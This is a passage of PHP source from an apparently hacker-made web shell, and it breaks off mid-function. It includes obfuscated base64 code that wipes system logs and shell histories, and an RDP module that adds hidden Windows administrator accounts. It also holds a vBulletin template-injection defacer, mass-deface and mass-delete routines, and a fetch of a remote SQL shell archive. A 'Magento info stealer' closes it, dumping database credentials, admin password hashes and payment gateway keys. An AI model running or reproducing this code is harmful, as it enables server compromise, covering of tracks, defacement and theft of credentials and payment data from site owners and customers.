  979. eval(base64_decode("aWYoc3RydG9sb3dlcihzdWJzdHIoUEhQX09TLCAwLCAzKSkgPT09ICd3aW4nKSB7IGVjaG8gIjxmb250IGNvbG9yPXJlZD5UaGlzIEZlYXR1cmUgaXMgZm9yIExpbnV4IFNlcnZlciBPbmx5ITwvZm9udD4iOyB9ZWxzZXsKCQkJZWNobyAiWypdIEcwaW5nIHRvIERlbGV0ZSBMMGcgU2VydmVyczp2IC4gLiAuPGJyPiI7CgkJCQlzbGVlcCgyKTsKCQkJJHJtID0gZXhlKCJmaW5kIC8gLW5hbWUgKi5iYXNoX2hpc3RvcnkgLWV4ZWMgcm0gLXJmIHt9IFw7Iik7CgkJCWlmKCEkcm0pe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xID0gZXhlKCJmaW5kIC8gLW5hbWUgKi5iYXNoX2xvZ291dCAtZXhlYyBybSAtcmYge30gXDsiKTsKCQkJaWYoISRybTEpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0yID0gZXhlKCdmaW5kIC8gLW5hbWUgImxvZyoiIC1leGVjIHJtIC1yZiB7fSBcOycpOwoJCQlpZighJHJtMil7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTMgPSBleGUoImZpbmQgLyAtbmFtZSAqLmxvZyAtZXhlYyBybSAtcmYge30gXDsiKTsKCQkJaWYoISRybTMpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm00ID0gZXhlKCJybSAtcmYgL3RtcC9sb2dzIik7CgkJCWlmKCEkcm00KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtNSA9IGV4ZSgicm0gLXJmIC9yb290Ly5iYXNoX2xvZ291dCIpOwoJCQlpZighJHJtNSl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTYgPSBleGUoInJtIC1yZiAkSElTVEZJTEUiKTsKCQkJaWYoISRybTYpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm03ID0gZXhlKCJybSAtcmYgL3Jvb3QvLmtzaF9oaXN0b3J5Iik7CgkJCWlmKCEkcm03KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtOCA9IGV4ZSgicm0gLXJmIC91c3IvbG9jYWwvYXBhY2hlL2xvZ3MiKTsKCQkJaWYoISRybTgpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm05ID0gZXhlKCJybSAtcmYgL3Jvb3QvLmJhc2hfaGlzdG9yeSIpOwoJCQlpZighJHJtOSl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTEwID0gZXhlKCJybSAtcmYgL3Vzci9sb2NhbC9hcGFjaGUvbG9nIik7CgkJCWlmKCEkcm0xMCl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTExID0gZXhlKCJybSAtcmYgL3Zhci9ydW4vdXRtcCIpOwoJCQlpZighJHJtMTEpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xMiA9IGV4ZSgicm0gLXJmIC92YXIvbG9ncyIpOwoJCQlpZighJHJtMTIpe2VjaG8gIjxmb250IGNvbG9yPXJlZD5VbmFibGUgdG8gRGVsZXRlIHRoaXMgTG9nITwvZm9udD48YnI+Ijt9ZWxzZXsgZWNobyAiPGZvbnQgY29sb3I9bGltZT5Mb2cgQ2xlYXIhPC9mb250Pjxicj4iO30KCQkJCXNsZWVwKDIpOwoJCQkkcm0xMyA9IGV4ZSgicm0gLXJmIC92YXIvbG9nIik7CgkJCWlmKCEkcm0xMyl7ZWNobyAiPGZvbnQgY29sb3I9cmVkPlVuYWJsZSB0byBEZWxldGUgdGhpcyBMb2chPC9mb250Pjxicj4iO31lbHNleyBlY2hvICI8Zm9udCBjb2xvcj1saW1lPkxvZyBDbGVhciE8L2ZvbnQ+PGJyPiI7fQoJCQkJc2xlZXAoMik7CgkJCSRybTE0ID0gZXhlKCJybSAtcmYgL3Zhci9hZG0iKTsKCQkJaWYoISRybTE0KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtMTUgPSBleGUoInJtIC1yZiAvZXRjL3d0bXAiKTsKCQkJaWYoISRybTE1KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCgyKTsKCQkJJHJtMTYgPSBleGUoInJtIC1yZiAvZXRjL3V0bXAiKTsKCQkJaWYoISRybTE2KXtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+VW5hYmxlIHRvIERlbGV0ZSB0aGlzIExvZyE8L2ZvbnQ+PGJyPiI7fWVsc2V7IGVjaG8gIjxmb250IGNvbG9yPWxpbWU+TG9nIENsZWFyITwvZm9udD48YnI+Ijt9CgkJCQlzbGVlcCg0KTsKCQkJZWNobyAiU2NyaXB0IFN1Y2Nlc3NmdWxseSBMb2FkZWQhICI7CgkJfQ=="));
  980. echo "</center>";
  981. }elseif($_GET['do'] == 'krdp_shell') {
  982. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  983. if($_POST['create']) {
  984. $user = htmlspecialchars($_POST['user']);
  985. $pass = htmlspecialchars($_POST['pass']);
  986. if(preg_match("/$user/", exe("net user"))) {
  987. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Available Already</font>";
  988. } else {
  989. $add_user = exe("net user $user $pass /add");
  990. $add_groups1 = exe("net localgroup Administrators $user /add");
  991. $add_groups2 = exe("net localgroup Administrator $user /add");
  992. $add_groups3 = exe("net localgroup Administrateur $user /add");
  993. echo "[ RDP ACCOUNT INFO ]<br>
  994. ------------------------------<br>
  995. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  996. Username: <font color=lime>$user</font><br>
  997. Password: <font color=lime>$pass</font><br>
  998. ------------------------------<br><br>
  999. [ STATUS ]<br>
  1000. ------------------------------<br>
  1001. ";
  1002. if($add_user) {
  1003. echo "[add user] -> <font color='lime'>Success!</font><br>";
  1004. } else {
  1005. echo "[add user] -> <font color='red'>Error!</font><br>";
  1006. }
  1007. if($add_groups1) {
  1008. echo "[add localgroup Administrators] -> <font color='lime'>Success!</font><br>";
  1009. } elseif($add_groups2) {
  1010. echo "[add localgroup Administrator] -> <font color='lime'>Success!</font><br>";
  1011. } elseif($add_groups3) {
  1012. echo "[add localgroup Administrateur] -> <font color='lime'>Success!</font><br>";
  1013. } else {
  1014. echo "[add localgroup] -> <font color='red'>Error!</font><br>";
  1015. }
  1016. echo "------------------------------<br>";
  1017. }
  1018. } elseif($_POST['s_opsi']) {
  1019. $user = htmlspecialchars($_POST['r_user']);
  1020. if($_POST['opsi'] == '1') {
  1021. $cek = exe("net user $user");
  1022. echo "Checking username <font color=lime>$user</font> ....... ";
  1023. if(preg_match("/$user/", $cek)) {
  1024. echo "[ <font color=lime>Available Already!</font> ]<br>
  1025. ------------------------------<br><br>
  1026. <pre>$cek</pre>";
  1027. } else {
  1028. echo "[ <font color=red>Not Available!</font> ]";
  1029. }
  1030. } elseif($_POST['opsi'] == '2') {
  1031. $cek = exe("net user $user spadepirates");
  1032. if(preg_match("/$user/", exe("net user"))) {
  1033. echo "[change password: <font color=lime>spadepirates</font>] -> ";
  1034. if($cek) {
  1035. echo "<font color=lime>Success!</font>";
  1036. } else {
  1037. echo "<font color=red>Error!</font>";
  1038. }
  1039. } else {
  1040. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
  1041. }
  1042. } elseif($_POST['opsi'] == '3') {
  1043. $cek = exe("net user $user /DELETE");
  1044. if(preg_match("/$user/", exe("net user"))) {
  1045. echo "[remove user: <font color=lime>$user</font>] -> ";
  1046. if($cek) {
  1047. echo "<font color=lime>Success!</font>";
  1048. } else {
  1049. echo "<font color=red>Error!</font>";
  1050. }
  1051. } else {
  1052. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> Not Available!</font>";
  1053. }
  1054. } else {
  1055. //
  1056. }
  1057. } else {
  1058. echo "<center><h1 class='titulo'>Create RDP</h1><br>
  1059. <form method='post'>
  1060. <input type='text' name='user' placeholder='username' value='spadeppirates' required>
  1061. <input type='text' name='pass' placeholder='password' value='spadepirates' required>
  1062. <input type='submit' name='create' value='>>'>
  1063. </form>
  1064. -- Option --<br>
  1065. <form method='post'>
  1066. <input type='text' name='r_user' placeholder='username' required>
  1067. <select name='opsi'>
  1068. <option value='1'>Check Username</option>
  1069. <option value='2'>Change Password</option>
  1070. <option value='3'>Clear Username</option>
  1071. </select>
  1072. <input type='submit' name='s_opsi' value='>>'>
  1073. </form></center>";
  1074. }
  1075. } else {
  1076. echo "<font color=red>This feature can only be used in Windows Server.</font>";
  1077. }
  1078. } elseif ($_GET['do'] == 'vb') { {
  1079. echo ' <center><h1 class="titulo">VB INDEX CHANGER</h1></center><br>
  1080. <form action method="post"><div align="center">
  1081. <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
  1082. </div><br>
  1083. ';
  1084. if (empty($_POST['index'])) {
  1085. echo "<center><FORM method=POST>";
  1086. echo "<table class=tabnet>
  1087. <th colspan=2>Vb Index Changer</th>
  1088. <tr><td>host </td><td><input class=inputz type=text size=60 name=localhost value=localhost></td></tr>
  1089. <tr><td>database </td><td><input class=inputz type=text size=60 name=database value=forum_vb></td></tr>
  1090. <tr><td>username </td><td><input class=inputz type=text size=60 name=username value=user_vb></td></tr>
  1091. <tr><td>password </td><td><input class=inputz type=text size=60 name=password value=vb></td></tr>
  1092. </tr>
  1093. <th colspan=2>Your Index Code</th></table><table class=tabnet>
  1094. <TEXTAREA name=index rows=13 style='width: 450px; height: 200px;' border=1 cols=69 name=code>Your Index Code Here...</TEXTAREA><br>
  1095. <INPUT class=inputzbut type=submit value=setting name=send>
  1096. </FORM></table></center>";
  1097. } else {
  1098. $localhost = $_POST['localhost'];
  1099. $database = $_POST['database'];
  1100. $username = $_POST['username'];
  1101. $password = $_POST['password'];
  1102. $index = $_POST['index'];
  1103. @mysql_connect($localhost, $username, $password) or die(mysql_error());
  1104. @mysql_select_db($database) or die(mysql_error());
  1105. $index = str_replace("'", "'", $index);
  1106. $set_index = "{${eval(base64_decode('";
  1107. $set_index .= base64_encode("echo "$index";");
  1108. $set_index .= "')) }}{${exit() }}</textarea>";
  1109. echo ("SET template ='" . $set_index . "' ");
  1110. $ok = @mysql_query("SET template ='" . $set_index . "'") or die(mysql_error());
  1111. if ($ok) {echo "Update success...<br>";}
  1112. }
  1113. }
  1114. } elseif ($_GET['do'] == 'whois') {
  1115. @set_time_limit(0);
  1116. @error_reporting(0);
  1117. function sws_domain_info($site) {
  1118. $getip = @file_get_contents("http://networktools.nl/whois/" . $site);
  1119. flush();
  1120. $ip = @findit($getip, '<pre>', '</pre>');
  1121. return $ip;
  1122. flush();
  1123. }
  1124. function sws_net_info($site) {
  1125. $getip = @file_get_contents("http://networktools.nl/asinfo/" .$site);
  1126. $ip = @findit($getip, '<pre>', '</pre>');
  1127. return $ip;
  1128. flush();
  1129. }
  1130. function sws_site_ser($site) {
  1131. $getip = @file_get_contents("http://networktools.nl/reverseip/" .$site);
  1132. $ip = @findit($getip, '<pre>', '</pre>');
  1133. return $ip;
  1134. flush();
  1135. }
  1136. function sws_sup_dom($site) {
  1137. $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=" . $site . "&Search+subdomains=Find+subdomains");
  1138. $ip = @findit($getip, '<strong>Nameservers found:</strong>', '<script type="text/javascript">');
  1139. return $ip;
  1140. flush();
  1141. }
  1142. function sws_port_scan($ip) {
  1143. $list_post = array('80', '21', '22', '2082', '25', '53', '110', '443', '143');
  1144. foreach ($list_post as $o_port) {
  1145. $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5);
  1146. if ($connect) {
  1147. echo ''.$ip.':~$ ' . $o_port . ' ??? <u style="color: white">Open</u> <br /><br />';
  1148. flush();
  1149. }
  1150. }
  1151. }
  1152. function findit($mytext, $starttag, $endtag) {
  1153. $posLeft = @stripos($mytext, $starttag) + strlen($starttag);
  1154. $posRight = @stripos($mytext, $endtag, $posLeft + 1);
  1155. return @substr($mytext, $posLeft, $posRight - $posLeft);
  1156. flush();
  1157. }
  1158. echo '<center><h1 class="titulo">WHOIS</h1>';
  1159. echo '<br />
  1160. <div class="sc"><form method="post"><table>
  1161. <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
  1162. <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  1163. </table></form></div>';
  1164. if (isset($_POST['scan'])) {
  1165. $site = @htmlentities($_POST['site']);
  1166. if (empty($site)) {
  1167. die('<br /><br /> Not add IP .. !');
  1168. }
  1169. $ip_port = @gethostbyname($site);
  1170. echo "<br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
  1171. <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
  1172. <div class='ru'> <br /><br /><pre>";
  1173. echo "~" . sws_port_scan($ip_port) . " </pre></div> ";
  1174. flush();
  1175. echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  1176. <div class="ru">
  1177. <pre>' . sws_domain_info($site) . '</pre></div>';
  1178. flush();
  1179. echo '<div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  1180. <div class="ru">
  1181. <pre>'.sws_net_info($site).'</pre> </div>';
  1182. flush();
  1183. echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  1184. <div class="ru">
  1185. <pre>'.sws_sup_dom($site).'</pre> </div>';
  1186. flush();
  1187. echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  1188. <div class="ru">
  1189. <pre>'.sws_site_ser($site).'</pre> </div>
  1190. <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
  1191. flush();
  1192. }
  1193. echo '</center>';
  1194. } elseif($_GET['do'] == 'mass_deface') {
  1195. echo "<center><h1 class='titulo'>MASS DEFACE</h1><br><form action=\"\" method=\"post\">\n";
  1196. $dirr=$_POST['d_dir'];
  1197. $index = $_POST["script"];
  1198. $index = str_replace('"',"'",$index);
  1199. $index = stripslashes($index);
  1200. function edit_file($file,$index){
  1201. if (is_writable($file)) {
  1202. clear_fill($file,$index);
  1203. echo "<Span style='color:green;'><strong> [+] Mass Deface 100% Successfull </strong></span><br></center>";
  1204. }
  1205. else {
  1206. echo "<Span style='color:red;'><strong> [-] Mass Deface Failed :( </strong></span><br></center>";
  1207. }
  1208. }
  1209. function hapus_massal($dir,$namafile) {
  1210. if(is_writable($dir)) {
  1211. $dira = scandir($dir);
  1212. foreach($dira as $dirb) {
  1213. $dirc = "$dir/$dirb";
  1214. $lokasi = $dirc.'/'.$namafile;
  1215. if($dirb === '.') {
  1216. if(file_exists("$dir/$namafile")) {
  1217. unlink("$dir/$namafile");
  1218. }
  1219. } elseif($dirb === '..') {
  1220. if(file_exists("".dirname($dir)."/$namafile")) {
  1221. unlink("".dirname($dir)."/$namafile");
  1222. }
  1223. } else {
  1224. if(is_dir($dirc)) {
  1225. if(is_writable($dirc)) {
  1226. if(file_exists($lokasi)) {
  1227. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1228. unlink($lokasi);
  1229. $idx = hapus_massal($dirc,$namafile);
  1230. }
  1231. }
  1232. }
  1233. }
  1234. }
  1235. }
  1236. }
  1237. function clear_fill($file,$index){
  1238. if(file_exists($file)){
  1239. $handle = fopen($file,'w');
  1240. fwrite($handle,'');
  1241. fwrite($handle,$index);
  1242. fclose($handle); } }
  1243.  
  1244. function gass(){
  1245. global $dirr , $index ;
  1246. chdir($dirr);
  1247. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1248. $files = scandir($dirr) ;
  1249. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1250. sort($files);
  1251. $n = 0 ;
  1252. foreach ($files as $file){
  1253. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1254. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1255. edit_file($file,$index);
  1256. flush();
  1257. $n = $n +1 ;
  1258. }
  1259. }
  1260. echo "<br>";
  1261. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  1262. }
  1263. function ListFiles($dirrall) {
  1264.  
  1265. if($dh = opendir($dirrall)) {
  1266.  
  1267. $files = Array();
  1268. $inner_files = Array();
  1269. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1270. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1271. while($file = readdir($dh)) {
  1272. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1273. if(is_dir($dirrall . "/" . $file)) {
  1274. $inner_files = ListFiles($dirrall . "/" . $file);
  1275. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1276. } else {
  1277. array_push($files, $dirrall . "/" . $file);
  1278. }
  1279. }
  1280. }
  1281.  
  1282. closedir($dh);
  1283. return $files;
  1284. }
  1285. }
  1286. function gass_all(){
  1287. global $index ;
  1288. $dirrall=$_POST['d_dir'];
  1289. foreach (ListFiles($dirrall) as $key=>$file){
  1290. $file = str_replace('//',"/",$file);
  1291. echo "<center><strong>$file</strong> ===>";
  1292. edit_file($file,$index);
  1293. flush();
  1294. }
  1295. $key = $key+1;
  1296. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  1297. function sabun_massal($dir,$namafile,$isi_script) {
  1298. if(is_writable($dir)) {
  1299. $dira = scandir($dir);
  1300. foreach($dira as $dirb) {
  1301. $dirc = "$dir/$dirb";
  1302. $lokasi = $dirc.'/'.$namafile;
  1303. if($dirb === '.') {
  1304. file_put_contents($lokasi, $isi_script);
  1305. } elseif($dirb === '..') {
  1306. file_put_contents($lokasi, $isi_script);
  1307. } else {
  1308. if(is_dir($dirc)) {
  1309. if(is_writable($dirc)) {
  1310. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1311. file_put_contents($lokasi, $isi_script);
  1312. $idx = sabun_massal($dirc,$namafile,$isi_script);
  1313. }
  1314. }
  1315. }
  1316. }
  1317. }
  1318. }
  1319. if($_POST['mass'] == 'onedir') {
  1320. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1321. $ini="http://";
  1322. $mainpath=$_POST[d_dir];
  1323. $file=$_POST[d_file];
  1324. $dir=opendir("$mainpath");
  1325. $code=base64_encode($_POST[script]);
  1326. $indx=base64_decode($code);
  1327. while($row=readdir($dir)){
  1328. $start=@fopen("$row/$file","w+");
  1329. $finish=@fwrite($start,$indx);
  1330. if ($finish){
  1331. echo"$ini$row/$file\n";
  1332. }
  1333. }
  1334. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1335. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1336. $dir=opendir("$mainpath");
  1337. $code=base64_encode($_POST[script]);
  1338. $indx=base64_decode($code);
  1339. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1340. $finish=@fwrite($start,$indx);
  1341. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1342. }
  1343.  
  1344. }
  1345. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1346. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1347. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1348. elseif($_POST['mass'] == 'massdeface') {
  1349. echo "<div style='margin: 5px auto; padding: 5px'>";
  1350. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1351. echo "</div>"; }
  1352. else {
  1353. echo "
  1354. <center><font style='text-decoration: underline;'>
  1355. Select Type:<br>
  1356. </font>
  1357. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  1358. <option value=\"onedir\">Mass Deface 1 Dir</option>
  1359. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1360. <option value=\"sabunkabeh\">Mass Deface Temp</option>
  1361. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1362. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1363. <font style='text-decoration: underline;'>Folder:</font><br>
  1364. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1365. <font style='text-decoration: underline;'>Filename:</font><br>
  1366. <input type='text' name='d_file' value='spadepirates.php' style='width: 450px;' height='10'><br>
  1367. <font style='text-decoration: underline;'>Index File:</font><br>
  1368. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Spade</textarea><br>
  1369. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1370. </form></center>";
  1371. }
  1372. }elseif($_GET['do'] == 'dbsql'){
  1373. echo "<center><br/><h1 class='titulo'>MYSQL DATABASE SHELL</h1><br>";
  1374. if(!file_exists('spade_sqlshell/sqlbuddy/index.php')){ $dizin = 'http://r00t.info/shell-dosyalar/sqlbuddy.zip';
  1375. function dosya_indir($link,$name=null) { $link_info = pathinfo($link);
  1376. $uzanti = strtolower($link_info['extension']);
  1377. $file = ($name) ? $name.'.'.$uzanti : $link_info['basename'];
  1378. $curl = curl_init($link);
  1379. $fopen = fopen($file,'w');
  1380. curl_setopt($curl, CURLOPT_HEADER,0);
  1381. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
  1382. curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);
  1383. curl_setopt($curl, CURLOPT_FILE, $fopen);
  1384. curl_exec($curl);
  1385. curl_close($curl);
  1386. fclose($fopen);
  1387. } dosya_indir($dizin, "sqlbuddy");
  1388. $zip = new ZipArchive();
  1389. $file = 'sqlbuddy.zip';
  1390. $zip->open($file);
  1391. $cikar = $zip->extractTo('spade_sqlshell/');
  1392. if(file_exists('sqlbuddy.zip')){ @unlink('sqlbuddy.zip');
  1393. } if($cikar){ echo "<iframe src=spade_sqlshell/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";
  1394. } else{ echo '<font color=red>Cant Execute SQL Shell!</font>';
  1395. } } elseif(file_exists('spade_sqlshell/sqlbuddy/index.php')){ echo "<iframe src=spade_sqlshell/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";
  1396. }
  1397. }elseif($_GET['do'] == 'magen') {
  1398. echo'
  1399. <div id="page-wrap">
  1400. <center>
  1401. <br>
  1402. <FORM action="" method="post">
  1403. <h1 class="titulo">MAGENTO INFO STEALER</h1><br>
  1404. <input type="hidden" name="form_action" value="2">
  1405. </div>
  1406. </div>
  1407. ';
  1408.  
  1409.  
  1410. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  1411. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  1412. if(isset($xml->global->resources->default_setup->connection)) {
  1413. $connection = $xml->global->resources->default_setup->connection;
  1414. $prefix = $xml->global->resources->db->table_prefix;
  1415. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  1416. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  1417.  
  1418. try {
  1419. $app = Mage::app('default');
  1420. Mage::getSingleton('core/session', array('name'=>'frontend'));
  1421. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  1422.  
  1423. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  1424. print("Could not connect: " . mysql_error());
  1425. }
  1426. mysql_select_db($connection->dbname);
  1427. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  1428.  
  1429. $crypto = new Varien_Crypt_Mcrypt();
  1430. $crypto->init($key);
  1431.  
  1432. //=========================================================================================================
  1433. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  1434. if (!$query){
  1435. echo "<center><b>Gagal</b></center>";
  1436. }else{
  1437. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  1438. echo'<br><br>
  1439. ====================================================================<br>
  1440. [ Admin FROM website : '.$site['website'].'] <br>
  1441. ====================================================================<br>';
  1442. }
  1443. echo "
  1444. <table border='1' align='center' >
  1445. <tr>
  1446. <td>id</td>
  1447. <td>firstname</td>
  1448. <td>lastname</td>
  1449. <td>email</td>
  1450. <td>username</td>
  1451. <td>password</td>
  1452. </tr>";
  1453. while($vx = mysql_fetch_array($query)) {
  1454. $no = 1;
  1455. $user_id = $vx['user_id'];
  1456. $username = $vx['username'];
  1457. $password = $vx['password'];
  1458. $email = $vx['email'];
  1459. $firstname = $vx['firstname'];
  1460. $lastname = $vx['lastname'];
  1461. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  1462. }
  1463. echo "</table><br>";
  1464. //=========================================================================================================
  1465. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  1466. if(mysql_num_rows($query) != 0){
  1467. if (!$query){
  1468. echo "<center><b>Gagal</b></center>";
  1469. }else{
